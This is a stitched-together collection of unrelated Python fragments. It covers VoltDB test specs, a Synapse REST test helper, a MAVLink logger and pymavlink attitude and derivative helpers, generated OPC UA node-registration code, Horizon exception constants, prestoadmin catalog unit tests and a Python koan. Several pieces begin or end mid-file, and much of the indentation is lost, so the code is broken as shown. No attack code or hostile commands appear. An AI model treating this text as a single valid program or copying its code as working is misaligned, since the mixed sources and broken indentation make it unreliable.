_defaults = {"dateTime": '', "rounding": 0.0, "note": '', "amount": 0.0}
_enums = {}
_refs = []
_many_refs = []
|
#!/usr/bin/env python
# This file is part of VoltDB.
# Copyright (C) 2008-2010 VoltDB Inc.
#
# VoltDB is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# VoltDB is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with VoltDB. If not, see <http://www.gnu.org/licenses/>.
testspec = """
class Database {
/** test comment */
// more comments
Partition* partitions; // more comments
Table* tables;
Program* programs;
Procedure* procedures;
}
/*
class Garbage {
Garbage garbage;
}
*/
class Partition {
bool isActive;
Range* ranges;
Replica* replicas;
}
class Table {
int type;
Table? buddy1;
Table? buddy2;
Column* columns;
Index* indexes;
Constraint* constraints;
}
class Program {
Program* programs;
    Procedure* procedures;
Table* tables;
}
"""
def checkeq( a, b ):
if a != b:
raise Exception( 'test failed: %r != %r' % (a,b) )
|
# -*- coding: utf-8 -*-
# Copyright 2014 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# twisted imports
from twisted.internet import defer
# trial imports
from tests import unittest
from synapse.api.constants import Membership
import json
import time
class RestTestCase(unittest.TestCase):
"""Contains extra helper functions to quickly and clearly perform a given
REST action, which isn't the focus of the test.
This subclass assumes there are mock_resource and auth_user_id attributes.
"""
def __init__(self, *args, **kwargs):
super(RestTestCase, self).__init__(*args, **kwargs)
self.mock_resource = None
self.auth_user_id = None
def mock_get_user_by_token(self, token=None):
return self.auth_user_id
@defer.inlineCallbacks
def create_room_as(self, room_creator, is_public=True, tok=None):
temp_id = self.auth_user_id
self.auth_user_id = room_creator
path = "/createRoom"
content = "{}"
if not is_public:
content = '{"visibility":"private"}'
if tok:
path = path + "?access_token=%s" % tok
(code, response) = yield self.mock_resource.trigger("POST", path, content)
self.assertEquals(200, code, msg=str(response))
self.auth_user_id = temp_id
defer.returnValue(response["room_id"])
@defer.inlineCallbacks
def invite(self, room=None, src=None, targ=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=src, targ=targ, tok=tok,
membership=Membership.INVITE,
expect_code=expect_code)
@defer.inlineCallbacks
    def join(self, room=None, user=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=user, targ=user, tok=tok,
membership=Membership.JOIN,
expect_code=expect_code)
    @defer.inlineCallbacks
def leave(self, room=None, user=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=user, targ=user, tok=tok,
membership=Membership.LEAVE,
expect_code=expect_code)
@defer.inlineCallbacks
def change_membership(self, room, src, targ, membership, tok=None,
expect_code=200):
temp_id = self.auth_user_id
self.auth_user_id = src
path = "/rooms/%s/state/m.room.member/%s" % (room, targ)
if tok:
path = path + "?access_token=%s" % tok
data = {
"membership": membership
}
(code, response) = yield self.mock_resource.trigger("PUT", path,
json.dumps(data))
self.assertEquals(expect_code, code, msg=str(response))
self.auth_user_id = temp_id
@defer.inlineCallbacks
def register(self, user_id):
(code, response) = yield self.mock_resource.trigger(
"POST",
"/register",
json.dumps({
"user": user_id,
"password": "test",
"type": "m.login.password"
}))
self.assertEquals(200, code)
defer.returnValue(response)
@defer.inlineCallbacks
def send(self, room_id, body=None, txn_id=None, tok=None,
expect_code=200):
if txn_id is None:
txn_id = "m%s" % (str(time.time()))
if body is None:
body = "body_text_here"
path = "/rooms/%s/send/m.room.message/%s" % (room_id, txn_id)
content = '{"msgtype":"m.text","body":"%s"}' % body
if tok:
path = path + "?access_token=%s" % tok
(code, response) = yield self.mock_resource.trigger("PUT", path, content)
self.assertEquals(expect_code, code, msg=str(response))
def assert_dict(self, required, actual):
"""Does a partial assert of a dict.
Args:
required (dict): The keys and value which MUST be in 'actual'.
actual (dict): The test result. Extra keys will not be checked.
"""
for key in required:
self.assertEquals(required[key], actual[key],
msg="%s mismatch. %s" % (key, actual))
|
"""Log MAVLink stream."""
import argparse
from pymavlink import mavutil
import pymavlink.dialects.v10.ceaufmg as mavlink
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--verbose", action='store_true',
help="print messages to STDOUT")
parser.add_argument("--device", required=True, help="serial port")
parser.add_argument("--log", type=argparse.FileType('w'),
help="Log file")
parser.add_argument("--baudrate", type=int, help="serial port baud rate",
default=57600)
args = parser.parse_args()
    conn = mavutil.mavlink_connection(args.device, baud=args.baudrate)
conn.logfile = args.log
while True:
msg = conn.recv_msg()
        if args.verbose and msg is not None:
print(msg)
if __name__ == '__main__':
main()
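# Example invocation (the script name, device path and file names are
# illustrative):
#     python log_mavlink.py --device /dev/ttyUSB0 --baudrate 57600 \
#         --log flight.tlog --verbose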
|
if ret > 180:
        ret -= 360
if ret < -180:
ret += 360
return ret
average_data = {}
def average(var, key, N):
'''average over N points'''
global average_data
if not key in average_data:
average_data[key] = [var]*N
return var
average_data[key].pop(0)
average_data[key].append(var)
return sum(average_data[key])/N
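# Illustrative behaviour of average() with a 3-point window:
#     average(9.0, 'alt', 3)   # -> 9.0  (window seeded as [9, 9, 9])
#     average(12.0, 'alt', 3)  # -> 10.0 ((9 + 9 + 12) / 3)
#     average(12.0, 'alt', 3)  # -> 11.0 ((9 + 12 + 12) / 3)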
derivative_data = {}
def second_derivative_5(var, key):
'''5 point 2nd derivative'''
global derivative_data
import mavutil
tnow = mavutil.mavfile_global.timestamp
if not key in derivative_data:
derivative_data[key] = (tnow, [var]*5)
return 0
(last_time, data) = derivative_data[key]
data.pop(0)
data.append(var)
derivative_data[key] = (tnow, data)
h = (tnow - last_time)
# N=5 2nd derivative from
# http://www.holoborodko.com/pavel/numerical-methods/numerical-derivative/smooth-low-noise-differentiators/
ret = ((data[4] + data[0]) - 2*data[2]) / (4*h**2)
return ret
def second_derivative_9(var, key):
'''9 point 2nd derivative'''
global derivative_data
import mavutil
tnow = mavutil.mavfile_global.timestamp
if not key in derivative_data:
derivative_data[key] = (tnow, [var]*9)
return 0
(last_time, data) = derivative_data[key]
data.pop(0)
data.append(var)
derivative_data[key] = (tnow, data)
h = (tnow - last_time)
    # N=9 2nd derivative from
# http://www.holoborodko.com/pavel/numerical-methods/numerical-derivative/smooth-low-noise-differentiators/
f = data
ret = ((f[8] + f[0]) + 4*(f[7] + f[1]) + 4*(f[6]+f[2]) - 4*(f[5]+f[3]) - 10*f[4])/(64*h**2)
return ret
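# For reference (illustrative; assumes uniformly spaced samples with
# spacing h), the two smooth-noise-robust stencils implemented above,
# in LaTeX notation with the centre sample at index i:
#   f''_i \approx (f_{i+2} - 2 f_i + f_{i-2}) / (4 h^2)                  (5-point)
#   f''_i \approx ((f_{i+4}+f_{i-4}) + 4(f_{i+3}+f_{i-3}) + 4(f_{i+2}+f_{i-2})
#                  - 4(f_{i+1}+f_{i-1}) - 10 f_i) / (64 h^2)             (9-point)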
lowpass_data = {}
def lowpass(var, key, factor):
'''a simple lowpass filter'''
global lowpass_data
if not key in lowpass_data:
lowpass_data[key] = var
else:
lowpass_data[key] = factor*lowpass_data[key] + (1.0 - factor)*var
return lowpass_data[key]
last_diff = {}
def diff(var, key):
'''calculate differences between values'''
global last_diff
ret = 0
if not key in last_diff:
last_diff[key] = var
return 0
ret = var - last_diff[key]
last_diff[key] = var
return ret
last_delta = {}
def delta(var, key, tusec=None):
'''calculate slope'''
global last_delta
if tusec is not None:
tnow = tusec * 1.0e-6
else:
import mavutil
tnow = mavutil.mavfile_global.timestamp
dv = 0
ret = 0
if key in last_delta:
(last_v, last_t, last_ret) = last_delta[key]
if last_t == tnow:
return last_ret
if tnow == last_t:
ret = 0
else:
ret = (var - last_v) / (tnow - last_t)
last_delta[key] = (var, tnow, ret)
return ret
def delta_angle(var, key, tusec=None):
'''calculate slope of an angle'''
global last_delta
if tusec is not None:
tnow = tusec * 1.0e-6
else:
import mavutil
tnow = mavutil.mavfile_global.timestamp
dv = 0
ret = 0
if key in last_delta:
(last_v, last_t, last_ret) = last_delta[key]
if last_t == tnow:
return last_ret
if tnow == last_t:
ret = 0
else:
dv = var - last_v
if dv > 180:
dv -= 360
if dv < -180:
dv += 360
ret = dv / (tnow - last_t)
last_delta[key] = (var, tnow, ret)
return ret
def roll_estimate(RAW_IMU,GPS_RAW_INT=None,ATTITUDE=None,SENSOR_OFFSETS=None, ofs=None, mul=None,smooth=0.7):
'''estimate roll from accelerometer'''
rx = RAW_IMU.xacc * 9.81 / 1000.0
ry = RAW_IMU.yacc * 9.81 / 1000.0
rz = RAW_IMU.zacc * 9.81 / 1000.0
if ATTITUDE is not None and GPS_RAW_INT is not None:
ry -= ATTITUDE.yawspeed * GPS_RAW_INT.vel*0.01
rz += ATTITUDE.pitchspeed * GPS_RAW_INT.vel*0.01
if SENSOR_OFFSETS is not None and ofs is not None:
rx += SENSOR_OFFSETS.accel_cal_x
ry += SENSOR_OFFSETS.accel_cal_y
rz += SENSOR_OFFSETS.accel_cal_z
rx -= ofs[0]
ry -= ofs[1]
rz -= ofs[2]
if mul is not None:
rx *= mul[0]
ry *= mul[1]
rz *= mul[2]
return lowpass(degrees(-asin(ry/sqrt(rx**2+ry**2+rz**2))),'_roll',smooth)
def pitch_estimate(RAW_IMU, GPS_RAW_INT=None,ATTITUDE=None, SENSOR_OFFSETS=None, ofs=None, mul=None, smooth=0.7):
'''estimate pitch from accelerometer'''
rx = RAW_IMU.xacc * 9.81 / 1000.0
ry = RAW_IMU.yacc * 9.81 / 1000.0
rz = RAW_IMU.zacc * 9.81 / 1000.0
if ATTITUDE is not None and GPS_RAW_INT is not None:
ry -= ATTITUDE.yawspeed * GPS_RAW_INT.vel*0.01
rz += ATTITUDE.pitchspeed * GPS_RAW_INT.vel*0.01
if SENSOR_OFFSETS is not None and ofs is not None:
rx += SENSOR_OFFSETS.accel_cal_x
ry += SENSOR_OFFSETS.accel_cal_y
rz += SENSOR_OFFSETS.accel_cal_z
rx -= ofs[0]
ry -= ofs[1]
rz -= ofs[2]
if mul is not None:
rx *= mul[0]
ry *= mul[1]
        rz *= mul[2]
return lowpass(degrees(asin(rx/sqrt(rx**2+ry**2+rz**2))),'_pitch',smooth)
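# The accelerometer tilt relations used by roll_estimate and pitch_estimate
# above (valid when the measured specific force is dominated by gravity),
# in LaTeX notation:
#   \mathrm{roll}  \approx -\arcsin( a_y / \sqrt{a_x^2 + a_y^2 + a_z^2} )
#   \mathrm{pitch} \approx  \arcsin( a_x / \sqrt{a_x^2 + a_y^2 + a_z^2} )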
def rotation(ATTITUDE):
    '''return the current DCM rotation matrix'''
r = Matrix3()
r.from_euler(ATTITUDE.roll, ATTITUDE.pitch, ATTITUDE.yaw)
return r
def mag_rotation(RAW_IMU, inclination, declination):
'''return an attitude rotation matrix that is consistent with the current mag
vector'''
m_body = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
m_earth = Vector3(m_body.length(), 0, 0)
r = Matrix3()
r.from_euler(0, -radians(inclination), radians(declination))
m_earth = r * m_earth
r.from_two_vectors(m_earth, m_body)
return r
def mag_yaw(RAW_IMU, inclination, declination):
'''estimate yaw from mag'''
m = mag_rotation(RAW_IMU, inclination, declination)
(r, p, y) = m.to_euler()
y = degrees(y)
if y < 0:
y += 360
return y
def mag_pitch(RAW_IMU, inclination, declination):
    '''estimate pitch from mag'''
m = mag_rotation(RAW_IMU, inclination, declination)
(r, p, y) = m.to_euler()
return degrees(p)
def mag_roll(RAW_IMU, inclination, declination):
'''estimate roll from mag'''
m = mag_rotation(RAW_IMU, inclination, declination)
(r, p, y) = m.to_euler()
return degrees(r)
def expected_mag(RAW_IMU, ATTITUDE, inclination, declination):
'''return expected mag vector'''
m_body = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
field_strength = m_body.length()
m = rotation(ATTITUDE)
r = Matrix3()
r.from_euler(0, -radians(inclination), radians(declination))
m_earth = r * Vector3(field_strength, 0, 0)
return m.transposed() * m_earth
def mag_discrepancy(RAW_IMU, ATTITUDE, inclination, declination=None):
'''give the magnitude of the discrepancy between observed and expected magnetic field'''
if declination is None:
import mavutil
declination = degrees(mavutil.mavfile_global.param('COMPASS_DEC', 0))
expected = expected_mag(RAW_IMU, ATTITUDE, inclination, declination)
mag = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
return degrees(expected.angle(mag))
def mag_inclination(RAW_IMU, ATTITUDE, declination=None):
    '''estimate the local magnetic field inclination from mag and attitude'''
if declination is None:
import mavutil
declination = degrees(mavutil.mavfile_global.param('COMPASS_DEC', 0))
r = rotation(ATTITUDE)
mag1 = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
mag1 = r * mag1
mag2 = Vector3(cos(radians(declination)), sin(radians(declination)), 0)
inclination = degrees(mag1.angle(mag2))
if RAW_IMU.zmag < 0:
inclination = -inclination
return inclination
def expected_magx(RAW_IMU, ATTITUDE, inclination, declination):
'''estimate from mag'''
v = expected_mag(RAW_IMU, ATTITUDE, inclination, declination)
return v.x
def expected_magy(RAW_IMU, ATTITUDE, inclination, declination):
'''estimate from mag'''
    v = expected_mag(RAW_IMU, ATTITUDE, inclination, declination)
    return v.y
|
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ReplaceDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11197, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11197, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11198, 0)
node.BrowseName = QualifiedName('UpdateDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdateDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11198, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11198, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11199, 0)
node.BrowseName = QualifiedName('DeleteRawCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteRawCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11199, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11199, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11200, 0)
node.BrowseName = QualifiedName('DeleteAtTimeCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteAtTimeCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11200, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11200, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11281, 0)
node.BrowseName = QualifiedName('InsertEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("InsertEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11281, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11281, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11282, 0)
node.BrowseName = QualifiedName('ReplaceEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ReplaceEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11282, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11282, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11283, 0)
node.BrowseName = QualifiedName('UpdateEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdateEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11283, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11283, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11502, 0)
node.BrowseName = QualifiedName('DeleteEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
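# The excerpt above repeats one identical add-variable/add-references
# pattern per capability flag before breaking off. A hypothetical helper
# (not part of the generated file) that factors out the node-creation half
# of that pattern; ids 46 and 68 are the standard OPC UA HasProperty
# reference type and PropertyType definition used throughout the excerpt:
def add_bool_property(server, node_id, name, parent_id):
    node = ua.AddNodesItem()
    node.RequestedNewNodeId = NumericNodeId(node_id, 0)
    node.BrowseName = QualifiedName(name, 0)
    node.NodeClass = NodeClass.Variable
    node.ParentNodeId = NumericNodeId(parent_id, 0)
    node.ReferenceTypeId = NumericNodeId(46, 0)
    node.TypeDefinition = NumericNodeId(68, 0)
    attrs = ua.VariableAttributes()
    attrs.DisplayName = LocalizedText(name)
    attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
    attrs.ValueRank = -1
    node.NodeAttributes = attrs
    server.add_nodes([node])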
|
# Copyright (c) 2014 Rackspace Hosting.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from openstack_dashboard import exceptions
#from solumclient.openstack.common.apiclient import exceptions as solumclient
NOT_FOUND = exceptions.NOT_FOUND
RECOVERABLE = exceptions.RECOVERABLE
# + (solumclient.ClientException,)
UNAUTHORIZED = exceptions.UNAUTHORIZED
|
express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
tests for catalog module
"""
import os
import fabric.api
from fabric.operations import _AttributeString
from mock import patch
from prestoadmin import catalog
from prestoadmin.util import constants
from prestoadmin.util.exception import ConfigurationError, \
ConfigFileNotFoundError
from prestoadmin.standalone.config import PRESTO_STANDALONE_USER_GROUP
from prestoadmin.util.local_config_util import get_catalog_directory
from tests.unit.base_unit_case import BaseUnitCase
class TestCatalog(BaseUnitCase):
def setUp(self):
super(TestCatalog, self).setUp(capture_output=True)
@patch('prestoadmin.catalog.os.path.isfile')
def test_add_not_exist(self, isfile_mock):
isfile_mock.return_value = False
self.assertRaisesRegexp(ConfigurationError,
'Configuration for catalog dummy not found',
catalog.add, 'dummy')
@patch('prestoadmin.catalog.validate')
@patch('prestoadmin.catalog.deploy_files')
@patch('prestoadmin.catalog.os.path.isfile')
def test_add_exists(self, isfile_mock, deploy_mock, validate_mock):
isfile_mock.return_value = True
catalog.add('tpch')
filenames = ['tpch.properties']
deploy_mock.assert_called_with(filenames,
get_catalog_directory(),
constants.REMOTE_CATALOG_DIR,
PRESTO_STANDALONE_USER_GROUP)
validate_mock.assert_called_with(filenames)
    @patch('prestoadmin.catalog.deploy_files')
    @patch('prestoadmin.catalog.os.path.isdir')
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.validate')
def test_add_all(self, mock_validate, listdir_mock, isdir_mock,
deploy_mock):
catalogs = ['tpch.properties', 'another.properties']
listdir_mock.return_value = catalogs
catalog.add()
deploy_mock.assert_called_with(catalogs,
get_catalog_directory(),
constants.REMOTE_CATALOG_DIR,
PRESTO_STANDALONE_USER_GROUP)
@patch('prestoadmin.catalog.deploy_files')
@patch('prestoadmin.catalog.os.path.isdir')
def test_add_all_fails_if_dir_not_there(self, isdir_mock, deploy_mock):
isdir_mock.return_value = False
self.assertRaisesRegexp(ConfigFileNotFoundError,
r'Cannot add catalogs because directory .+'
r' does not exist',
catalog.add)
self.assertFalse(deploy_mock.called)
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
@patch('prestoadmin.catalog.os.remove')
def test_remove(self, local_rm_mock, exists_mock, sudo_mock):
script = ('if [ -f /etc/presto/catalog/tpch.properties ] ; '
'then rm /etc/presto/catalog/tpch.properties ; '
'else echo "Could not remove catalog \'tpch\'. '
'No such file \'/etc/presto/catalog/tpch.properties\'"; fi')
exists_mock.return_value = True
fabric.api.env.host = 'localhost'
catalog.remove('tpch')
sudo_mock.assert_called_with(script)
local_rm_mock.assert_called_with(get_catalog_directory() +
'/tpch.properties')
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
def test_remove_failure(self, exists_mock, sudo_mock):
exists_mock.return_value = False
fabric.api.env.host = 'localhost'
out = _AttributeString()
out.succeeded = False
sudo_mock.return_value = out
self.assertRaisesRegexp(SystemExit,
'\\[localhost\\] Failed to remove catalog tpch.',
catalog.remove,
'tpch')
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
def test_remove_no_such_file(self, exists_mock, sudo_mock):
exists_mock.return_value = False
fabric.api.env.host = 'localhost'
error_msg = ('Could not remove catalog tpch: No such file ' +
os.path.join(get_catalog_directory(), 'tpch.properties'))
out = _AttributeString(error_msg)
out.succeeded = True
sudo_mock.return_value = out
self.assertRaisesRegexp(SystemExit,
'\\[localhost\\] %s' % error_msg,
catalog.remove,
'tpch')
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.os.path.isdir')
def test_warning_if_connector_dir_empty(self, isdir_mock, listdir_mock):
isdir_mock.return_value = True
listdir_mock.return_value = []
catalog.add()
self.assertEqual('\nWarning: Directory %s is empty. No catalogs will'
' be deployed\n\n' % get_catalog_directory(),
self.test_stderr.getvalue())
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.os.path.isdir')
def test_add_permission_denied(self, isdir_mock, listdir_mock):
isdir_mock.return_value = True
error_msg = ('Permission denied')
listdir_mock.side_effect = OSError(13, error_msg)
fabric.api.env.host = 'localhost'
        self.assertRaisesRegexp(SystemExit, r'\[localhost\] %s' % error_msg,
catalog.add)
@patch('prestoadmin.catalog.os.remove')
@patch('prestoadmin.catalog.remove_file')
def test_remove_os_error(self, remove_file_mock, remove_mock):
fabric.api.env.host = 'localhost'
error = OSError(13, 'Permission denied')
remove_mock.side_effect = error
self.assertRaisesRegexp(OSError, 'Permission denied',
catalog.remove, 'tpch')
@patch('prestoadmin.catalog.secure_create_directory')
@patch('prestoadmin.util.fabricapi.put')
def test_deploy_files(self, put_mock, create_dir_mock):
local_dir = '/my/local/dir'
remote_dir = '/my/remote/dir'
catalog.deploy_files(['a', 'b'], local_dir, remote_dir,
PRESTO_STANDALONE_USER_GROUP)
create_dir_mock.assert_called_with(remote_dir, PRESTO_STANDALONE_USER_GROUP)
put_mock.assert_any_call('/my/local/dir/a', remote_dir, use_sudo=True,
mode=0600)
put_mock.assert_any_call('/my/local/dir/b', remote_dir, use_sudo=True,
mode=0600)
@patch('prestoadmin.catalog.os.path.isfile')
@patch("__builtin__.open")
def test_validate(self, open_mock, is_file_mock):
is_file_mock.return_value = True
file_obj = open_mock.return_value.__enter__.return_value
file_obj.read.return_value = 'connector.noname=example'
self.assertRaisesRegexp(ConfigurationError,
'Catalog configuration example.properties '
'does not contain connector.name',
catalog.add, 'example')
@patch('prestoadmin.catalog.os.path.isfile')
def test_validate_fail(self, is_file_mock):
is_file_mock.return_value = True
self.assertRaisesRegexp(
SystemExit,
'Error validating ' + os.path.join(get_catalog_directory(), 'example.properties') + '\n\n'
'Underlying exception:\n No such file or directory',
catalog.add, 'example')
@patch('prestoadmin.catalog.get')
@patch('prestoadmin.catalog.files.exists')
@patch('prestoadmin.catalog.ensure_directory_exists')
@patch('prestoadmin.catalog.os.path.exists')
def test_gather_connectors(self, path_exists, ensure_dir_exists,
files_exists, get_mock):
        fabric.api.env.host = 'any_host'
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutDecoratingWithFunctions(Koan):
def addcowbell(fn):
fn.wow_factor = 'COWBELL BABY!'
return fn
@addcowbell
    def mediocre_song(self):
return "o/~ We all live in a broken submarine o/~"
    def test_decorators_can_modify_a_function(self):
self.assertMatch(__, self.mediocre_song())
self.assertEqual(__, self.mediocre_song.wow_factor)
# ------------------------------------------------------------------
def xmltag(fn):
def func(*args):
return '<' + fn(*args) + '/>'
